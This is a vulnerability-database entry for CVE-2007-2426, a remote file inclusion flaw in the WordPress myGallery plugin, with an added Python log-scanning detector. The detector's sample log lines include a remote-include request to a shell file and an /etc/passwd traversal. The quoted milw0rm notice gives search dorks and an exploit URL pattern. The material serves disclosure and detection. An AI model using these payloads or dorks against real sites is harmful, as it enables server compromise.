WordPress MyGallery Plugin 'mygallerybrowser.php' Remote File Inclusion Vulnerability

Vulnerability ID: 1112818    Type: Code injection
Published: 2007-04-29    Updated: 2007-05-04
CVE ID: CVE-2007-2426    CNNVD ID: CNNVD-200705-015
Platform: PHP    CVSS score: 7.5
|Source
https://www.exploit-db.com/exploits/3814
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-015
|Details
PHP remote file inclusion vulnerability in myfunctions/mygallerybrowser.php in the WordPress myGallery plugin. The script reads the myPath parameter from the request ($_GET, or $_POST when a POST body is present) and passes it unvalidated to require_once($mypath.'/wp-config.php'). A remote attacker can supply a URL in myPath and execute arbitrary PHP code on the server.
|Exploit
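The following is an added detection example, not part of the advisory or of the myGallery plugin, that scans web-server access-log lines for attempts against the myPath parameter described above. It mirrors what the vulnerable code does with the value (concatenates it with '/wp-config.php' and includes it): a value carrying a URL scheme is a remote include attempt, and a value with '..' or an embedded null byte is a local-file-inclusion attempt against the same line, which PHP's allow_url_include=Off (the default since PHP 5.2.0) does not stop. The log lines, IP addresses and plugin path are constructed for the example; the script name and parameter name come from the advisory.

```python
# Added example (not from the advisory or the plugin): flag requests that try
# to exploit the myPath include in mygallerybrowser.php, scanning constructed
# Apache/nginx "combined"-format access-log lines.
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines for this example; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Apr/2007:10:00:01 +0000] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://203.0.113.99/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Apr/2007:10:00:02 +0000] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../../../etc/passwd%00 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [29/Apr/2007:10:00:03 +0000] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=/var/www/html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [29/Apr/2007:10:00:04 +0000] "GET /index.php?p=3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Apr/2007:10:00:05 +0000] "POST /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Stream wrappers that require_once() would fetch or interpret instead of a
# local directory. "http"/"ftp" need allow_url_include; the php:// and data:
# wrappers are worth flagging as well because they reach include() too.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "php", "data", "expect",
                  "phar", "file", "zip", "compress.zlib"}

# One "combined" log line: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

VULN_SCRIPT = "/mygallerybrowser.php"   # script named in the advisory


def classify_mypath(value):
    """Classify an already-URL-decoded myPath value as the vulnerable line
    require_once($mypath . '/wp-config.php') would treat it."""
    scheme = urlsplit(value).scheme.lower()
    if scheme in REMOTE_SCHEMES or "://" in value:
        # A trailing '?' in the URL turns the appended '/wp-config.php' into
        # a query string, so the attacker's file is what gets included.
        return "remote_include"
    segments = value.replace("\\", "/").split("/")
    if "\x00" in value or ".." in segments:
        # Null byte truncates the appended suffix on PHP of that era;
        # '..' walks out of the expected directory. Local include attempt.
        return "traversal"
    return "benign"


def scan_log(log_text):
    """Return one finding per request to the vulnerable script."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if not target.path.endswith(VULN_SCRIPT):
            continue
        params = parse_qs(target.query, keep_blank_values=True)
        values = params.get("myPath")
        if values is None:
            # The script also reads myPath from $_POST, and POST bodies are
            # not in the access log: flag for manual review of the body.
            mypath = None
            verdict = "body_not_logged" if m.group("method") == "POST" else "no_mypath"
        else:
            mypath = values[0]
            verdict = classify_mypath(mypath)
        findings.append({"ip": m.group("ip"), "method": m.group("method"),
                         "myPath": mypath, "verdict": verdict})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Run as-is it reports the four requests to mygallerybrowser.php from the sample (remote include, traversal, a benign local path, and a POST whose body is not logged) and ignores the unrelated index.php request. The remote-include check is the one that matters for CVE-2007-2426; the traversal check is the caveat, since the same unvalidated parameter still reaches require_once when URL includes are disabled.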
AAAAAAAAA AAAAAAAA  AAA   AAA    AAA      AAAAAAAA   
AAAAAAAAA AAAAAAAAA AAA   AAA   AAAAA    AAAAAAAAAA  
   AAA    AAA   AAA  AAA AAA   AAAAAAA  AAA       
   AAA    AAAAAAAAA   AAAAA   AAA   AAA AAA     AAAAA
   AAA    AAAAAAAA     AAA    AAA   AAA AAA     AAAAA
   AAA    AAA AAA      AAA    AAAAAAAAA AAA      AAA  
   AAA    AAA  AAA     AAA    AAA   AAA  AAAAAAAAAA    
   AAA    AAA   AAA    AAA    AAA   AAA   AAAAAAAA     


# myGallery 1.2.1 (myPath) Remote File Include Vulnerability
# Script Page : http://www.wildbits.de/usr_files/mygallery_1.2.1.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code 
#########################################################
# if (!$_POST){
# 	$mypath=$_GET['myPath']; <---------[+]
# 
# }
# else {
# 	$mypath=$_POST['myPath'];<---------[+]
# 	
# 	
# }
# require_once($mypath.'/wp-config.php');<---------[+]
########################################################
# Dork : 
# inurl:/mygallery/myfunctions/ (OR) Index of /mygallery/myfunctions (OR) inurl:mygallerytmpl.php
# Ex:
# [Path_myGallery]/mygallery/myfunctions/mygallerybrowser.php?myPath=Shell
# Sp.Thanx = Tryag-Team

# milw0rm.com [2007-04-29]
|References

Source: XF
Name: mygallery-mygallerybrowser-file-include(33955)
Link: http://xforce.iss.net/xforce/xfdb/33955
Source: BID
Name: 23702
Link: http://www.securityfocus.com/bid/23702
Source: MILW0RM
Name: 3814
Link: http://www.milw0rm.com/exploits/3814
Source: VUPEN
Name: ADV-2007-1582
Link: http://www.frsirt.com/english/advisories/2007/1582
Source: SECUNIA
Name: 25042
Link: http://secunia.com/advisories/25042
Source: OSVDB
Name: 34356
Link: http://osvdb.org/34356